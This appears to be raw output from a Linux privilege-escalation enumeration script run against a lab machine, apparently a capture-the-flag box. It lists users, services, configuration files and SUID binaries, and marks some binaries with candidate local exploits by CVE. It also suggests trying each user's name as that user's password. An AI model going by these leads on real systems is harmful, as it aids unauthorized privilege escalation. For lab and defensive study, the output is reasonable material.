╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 475 systemd-network systemd-network :1.0 systemd-networkd.service - - :1.1 654 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - :1.14 21629 busctl pericles :1.14 apache2.service - - :1.2 841 systemd-logind root :1.2 systemd-logind.service - - :1.3 656 systemd-timesyn systemd-timesync :1.3 systemd-timesyncd.service - - :1.4 1 systemd root :1.4 init.scope - - :1.6 764 accounts-daemon[0m root :1.6 accounts-daemon.service - - :1.7 798 networkd-dispat root :1.7 networkd-dispatcher.service - - :1.8 940 polkitd root :1.8 polkit.service - - com.ubuntu.LanguageSelector - - - (activatable) - - - com.ubuntu.SoftwareProperties - - - (activatable) - - - org.freedesktop.Accounts 764 accounts-daemon[0m root :1.6 accounts-daemon.service - - org.freedesktop.DBus 1 systemd root - init.scope - - org.freedesktop.PackageKit - - - (activatable) - - - org.freedesktop.PolicyKit1 940 polkitd root :1.8 polkit.service - - org.freedesktop.bolt - - - (activatable) - - - org.freedesktop.fwupd - - - (activatable) - - - org.freedesktop.hostname1 - - - (activatable) - - - org.freedesktop.locale1 - - - (activatable) - - - org.freedesktop.login1 841 systemd-logind root :1.2 systemd-logind.service - - org.freedesktop.network1 475 systemd-network systemd-network :1.0 systemd-networkd.service - - org.freedesktop.resolve1 654 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - org.freedesktop.systemd1 1 systemd root :1.4 init.scope - - org.freedesktop.thermald - - - (activatable) - - - org.freedesktop.timedate1 - - - (activatable) - - - org.freedesktop.timesync1 656 systemd-timesyn systemd-timesync :1.3 systemd-timesyncd.service - -
╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS time 127.0.0.1 localhost 127.0.1.1 time
::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters
nameserver 127.0.0.53 options edns0
╔══════════╣ Interfaces # symbolic names for networks, see networks(5) for more information link-local 169.254.0.0 ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.214 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 fe80::250:56ff:feb9:3225 prefixlen 64 scopeid 0x20<link> inet6 dead:beef::250:56ff:feb9:3225 prefixlen 64 scopeid 0x0<global> ether 00:50:56:b9:32:25 txqueuelen 1000 (Ethernet) RX packets 961829 bytes 65454081 (65.4 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 355552 bytes 21291184 (21.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 12430 bytes 884182 (884.1 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 12430 bytes 884182 (884.1 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump? No
╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (3)
╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console pericles:x:1000:1000:Pericles:/home/pericles:/bin/bash root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=1000(pericles) gid=1000(pericles) groups=1000(pericles) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync) uid=103(messagebus) gid=106(messagebus) groups=106(messagebus) uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm) uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=106(tss) gid=111(tss) groups=111(tss) uid=107(uuidd) gid=112(uuidd) groups=112(uuidd) uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump) uid=109(landscape) gid=115(landscape) groups=115(landscape) uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m) uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=112(mysql) gid=118(mysql) groups=118(mysql) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=998(lxd) gid=100(users) groups=100(users) uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now 13:42:41 up 1:16, 0 users, load average: 0.56, 0.17, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons reboot system boot Fri Sep 25 15:06:26 2020 - Fri Sep 25 15:13:55 2020 (00:07) 0.0.0.0 pericles pts/0 Mon Sep 21 02:11:17 2020 - Mon Sep 21 05:10:27 2020 (02:59) 192.168.0.104 pericles pts/0 Mon Sep 21 01:19:31 2020 - Mon Sep 21 02:10:46 2020 (00:51) 192.168.0.104 pericles tty1 Mon Sep 21 01:19:03 2020 - down (05:52) 0.0.0.0 reboot system boot Mon Sep 21 00:59:22 2020 - Mon Sep 21 07:11:25 2020 (06:12) 0.0.0.0 pericles pts/0 Sun Sep 20 13:54:46 2020 - Sun Sep 20 16:27:24 2020 (02:32) 192.168.0.103 pericles tty1 Sun Sep 20 13:53:52 2020 - down (02:33) 0.0.0.0 reboot system boot Sun Sep 20 12:07:06 2020 - Sun Sep 20 16:27:35 2020 (04:20) 0.0.0.0
wtmp begins Sun Sep 20 12:07:06 2020
╔══════════╣ Last time logon each user Username Port From Latest root tty1 Thu Dec 16 14:58:37 +0000 2021 pericles pts/0 10.10.14.5 Fri Oct 23 09:19:19 +0000 2020 root tty1 Thu Dec 16 14:58:37 +0000 2021
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /snap/bin/lxc /usr/bin/nc /usr/bin/netcat /usr/bin/perl /usr/bin/php /usr/bin/ping /usr/bin/python3 /usr/bin/ruby /usr/bin/sudo /usr/bin/wget
╔══════════╣ Installed Compilers ╔══════════╣ Searching mysql credentials and exec From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
╔══════════╣ Analyzing MariaDB Files (limit 70) -rw------- 1 root root 317 Sep 21 2020 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.41 (Ubuntu) Server built: 2020-08-12T19:46:17 httpd Not Found Nginx version: nginx Not Found /etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$"> /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$"> /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source -- /etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$"> /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$"> /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source ══╣ PHP exec extensions drwxr-xr-x 2 root root 4096 Dec 16 2021 /etc/apache2/sites-enabled drwxr-xr-x 2 root root 4096 Dec 16 2021 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Sep 21 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost>
-rw-r--r-- 1 root root 1332 Apr 13 2020 /etc/apache2/sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> lrwxrwxrwx 1 root root 35 Sep 21 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost>
-rw-r--r-- 1 root root 72941 May 26 2020 /etc/php/7.4/apache2/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 72539 May 26 2020 /etc/php/7.4/cli/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Oct 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Dec 16 2021 /etc/ldap
drwxr-xr-x 2 root root 32 Mar 11 2020 /snap/core18/1705/etc/ldap
drwxr-xr-x 2 root root 32 Jul 24 2020 /snap/core18/1885/etc/ldap
╔══════════╣ Searching ssl/ssh files ╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 599 Sep 20 2020 /etc/ssh/ssh_host_dsa_key.pub -rw-r--r-- 1 root root 171 Sep 20 2020 /etc/ssh/ssh_host_ecdsa_key.pub -rw-r--r-- 1 root root 91 Sep 20 2020 /etc/ssh/ssh_host_ed25519_key.pub -rw-r--r-- 1 root root 563 Sep 20 2020 /etc/ssh/ssh_host_rsa_key.pub
ChallengeResponseAuthentication no UsePAM yes PasswordAuthentication yes ══╣ Some certificates were found (out limited): /etc/pki/fwupd-metadata/LVFS-CA.pem /etc/pki/fwupd/LVFS-CA.pem /etc/pollinate/entropy.ubuntu.com.pem /etc/ssl/certs/ACCVRAIZ1.pem /etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem /etc/ssl/certs/Actalis_Authentication_Root_CA.pem /etc/ssl/certs/AffirmTrust_Commercial.pem /etc/ssl/certs/AffirmTrust_Networking.pem /etc/ssl/certs/AffirmTrust_Premium.pem /etc/ssl/certs/AffirmTrust_Premium_ECC.pem /etc/ssl/certs/Amazon_Root_CA_1.pem /etc/ssl/certs/Amazon_Root_CA_2.pem /etc/ssl/certs/Amazon_Root_CA_3.pem /etc/ssl/certs/Amazon_Root_CA_4.pem /etc/ssl/certs/Atos_TrustedRoot_2011.pem /etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem /etc/ssl/certs/Baltimore_CyberTrust_Root.pem /etc/ssl/certs/Buypass_Class_2_Root_CA.pem /etc/ssl/certs/Buypass_Class_3_Root_CA.pem /etc/ssl/certs/CA_Disig_Root_R2.pem 14249PSTORAGE_CERTSBIN
══╣ Writable ssh and gpg agents /etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket /etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket /etc/systemd/user/sockets.target.wants/gpg-agent.socket /etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config Include /etc/ssh/sshd_config.d/*.conf ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info Include /etc/ssh/ssh_config.d/*.conf Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Dec 16 2021 /etc/pam.d -rw-r--r-- 1 root root 2133 May 29 2020 /etc/pam.d/sshd account required pam_nologin.so session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close session required pam_loginuid.so session optional pam_keyinit.so force revoke session optional pam_motd.so motd=/run/motd.dynamic session optional pam_motd.so noupdate session optional pam_mail.so standard noenv session required pam_limits.so session required pam_env.so session required pam_env.so user_readenv=1 envfile=/etc/default/locale session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation tmux 3.0a
/tmp/tmux-1000 ╔══════════╣ Analyzing Cloud Init Files (limit 70) -rw-r--r-- 1 root root 3517 Jan 15 2020 /snap/core18/1705/etc/cloud/cloud.cfg lock_passwd: True -rw-r--r-- 1 root root 3517 Jun 3 2020 /snap/core18/1885/etc/cloud/cloud.cfg lock_passwd: True
╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 200 Mar 11 2020 /snap/core18/1705/usr/share/keyrings drwxr-xr-x 2 root root 200 Jul 24 2020 /snap/core18/1885/usr/share/keyrings drwxr-xr-x 2 root root 4096 Dec 16 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /snap/core18/1705/etc/pam.d/passwd passwd file: /snap/core18/1705/etc/passwd passwd file: /snap/core18/1705/usr/share/bash-completion/completions/passwd passwd file: /snap/core18/1705/usr/share/lintian/overrides/passwd passwd file: /snap/core18/1705/var/lib/extrausers/passwd passwd file: /snap/core18/1885/etc/pam.d/passwd passwd file: /snap/core18/1885/etc/passwd passwd file: /snap/core18/1885/usr/share/bash-completion/completions/passwd passwd file: /snap/core18/1885/usr/share/lintian/overrides/passwd passwd file: /snap/core18/1885/var/lib/extrausers/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 2796 Apr 9 2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Apr 9 2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Apr 9 2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw------- 1 pericles pericles 1200 Oct 2 2020 /home/pericles/.gnupg/trustdb.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/1705/usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/1705/usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/1705/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/1705/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/1705/usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/1885/usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/1885/usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/1885/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/1885/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/1885/usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 3267 Mar 10 2020 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 2236 Mar 30 2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg -rw-r--r-- 1 root root 2264 Mar 30 2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
drwx------ 3 pericles pericles 4096 Jan 13 13:42 /home/pericles/.gnupg
╔══════════╣ Analyzing Postfix Files (limit 70) -rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/1705/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/1885/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 May 26 2020 /etc/php/7.4/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Oct 6 2020 /usr/share/php7.4-common/common/ftp.ini
╔══════════╣ Analyzing DNS Files (limit 70) -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc -rw-r--r-- 1 pericles pericles 3771 Feb 25 2020 /home/pericles/.bashrc -rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/1705/etc/skel/.bashrc -rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/1885/etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile -rw-r--r-- 1 pericles pericles 807 Feb 25 2020 /home/pericles/.profile -rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/1705/etc/skel/.profile -rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/1885/etc/skel/.profile
╔════════════════════════════════════╗ ══════════════════════╣ Files with Interesting Permissions ╠══════════════════════ ╚════════════════════════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation strings Not Found -rwsr-xr-x 1 root root 23K Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 463K May 29 2020 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 128K Jul 10 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount -rwsr-xr-x 1 root root 84K Apr 16 2020 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 31K Aug 16 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) -rwsr-xr-x 1 root root 55K Apr 2 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 67K Apr 2 2020 /usr/bin/su -rwsr-xr-x 1 root root 87K Apr 16 2020 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39K Apr 2 2020 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 52K Apr 16 2020 /usr/bin/chsh -rwsr-xr-x 1 root root 67K Apr 16 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 44K Apr 16 2020 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 109K Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-x 1 root root 109K Sep 30 2020 /snap/snapd/9607/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-x 1 root root 43K Jan 8 2020 /snap/core18/1705/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1705/bin/ping -rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1705/bin/su -rwsr-xr-x 1 root root 27K Jan 8 2020 /snap/core18/1705/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1705/usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1705/usr/bin/chsh -rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1705/usr/bin/gpasswd -rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1705/usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1705/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1705/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-- 1 root systemd-resolve 42K Jun 10 2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 43K Mar 5 2020 /snap/core18/1885/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1885/bin/ping -rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/bin/su -rwsr-xr-x 1 root root 27K Mar 5 2020 /snap/core18/1885/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/usr/bin/chsh -rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd -rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1885/usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1885/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1885/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation -rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root ssh 343K May 29 2020 /usr/bin/ssh-agent -rwxr-sr-x 1 root shadow 31K Apr 16 2020 /usr/bin/expiry -rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab -rwxr-sr-x 1 root shadow 83K Apr 16 2020 /usr/bin/chage -rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write -rwxr-sr-x 1 root tty 35K Apr 2 2020 /usr/bin/wall -rwxr-sr-x 1 root shadow 43K Dec 17 2019 /usr/sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 43K Dec 17 2019 /usr/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /snap/core18/1705/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /snap/core18/1705/sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/1705/usr/bin/chage -rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/1705/usr/bin/expiry -rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/1705/usr/bin/ssh-agent -rwxr-sr-x 1 root tty 31K Jan 8 2020 /snap/core18/1705/usr/bin/wall -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /snap/core18/1885/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /snap/core18/1885/sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/1885/usr/bin/chage -rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/1885/usr/bin/expiry -rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/1885/usr/bin/ssh-agent -rwxr-sr-x 1 root tty 31K Mar 5 2020 /snap/core18/1885/usr/bin/wall
╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /etc/ld.so.conf Content of /etc/ld.so.conf: include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d /etc/ld.so.conf.d/libc.conf - /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf - /usr/local/lib/x86_64-linux-gnu - /lib/x86_64-linux-gnu - /usr/lib/x86_64-linux-gnu
